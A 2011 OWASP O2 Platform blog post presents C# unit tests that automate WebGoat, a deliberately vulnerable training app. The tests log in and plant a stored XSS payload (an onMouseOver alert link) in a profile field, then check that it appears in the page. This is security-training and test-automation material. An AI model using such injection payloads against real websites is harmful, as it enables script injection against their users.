OWASP O2 Platform Blog

WebGoat – First Example of O2 WebGoat API

This script and video shows a first example of the API that will be developed under O2 that will automate WebGoat’s funcionality, Lessons and Exploits

The WebGoat scripts are included in the local O2 Scripts folder and can also be seen here

Video: WebGoat – First Example of O2’s WebGoat API

Source Code: unit tests from WebGoat_BlackBox_Exploits.cs

        public string Open_Main_Page()
        {
            setup();
            webGoat.openMainPage();
            var pageHtml = ie.html();
            Assert.That(pageHtml.contains("WebGoat"),"Could not find the word WebGoat in the default page");
            if (ie.hasButton("Start WebGoat"))
                ie.button("Start WebGoat").flash().click();
            return "ok";
        }

        [Test]
        public string Exploit_Stage_1_Stored_XSS_OK()
        {
            return Exploit_Stage_1_Stored_XSS("address1");
        }

        [Test]
        public string Exploit_Stage_1_Stored_XSS_Fail()
        {
            return Exploit_Stage_1_Stored_XSS("description");
        }

        private string Exploit_Stage_1_Stored_XSS(string fieldToInsertPayload)
        {
            setup();
            var payload = "<a href=\"\" onMouseOver=\"javascript:alert('xss')\">Over me to see xss</a>";
            webGoat.openMainPage();
            ie.link("Cross-Site Scripting (XSS)").flash().click();
            ie.link("LAB: Cross Site Scripting").flash().click();
            ie.link("Stage 1: Stored XSS").flash();
            ie.field("password").flash().value("larry");
            ie.button("Login").flash().click();
            ie.selectLists()[1].options()[0].select().flash();
            ie.button("ViewProfile").flash().click();
            ie.button("EditProfile").flash().click();
            ie.field(fieldToInsertPayload).value(payload).flash();
            ie.button("UpdateProfile").flash().click();
            Assert.That(ie.html().contains("onmouseover=\"javascript:alert('xss')\""), "Payload was not inserted into page");
            return "ok";
        }

        [Test]
        public string Stage_1_Stored_XSS_Restart_Lesson()
        {
            setup();
            webGoat.openMainPage();
            ie.link("Cross-Site Scripting (XSS)").flash().click();
            ie.link("LAB: Cross Site Scripting").flash().click();
            ie.link("Stage 1: Stored XSS").flash().click();
            ie.link("Restart this Lesson").flash().click();
            return "ok";
        }

July 21, 2011 Posted by | videos, WebGoat | Leave a comment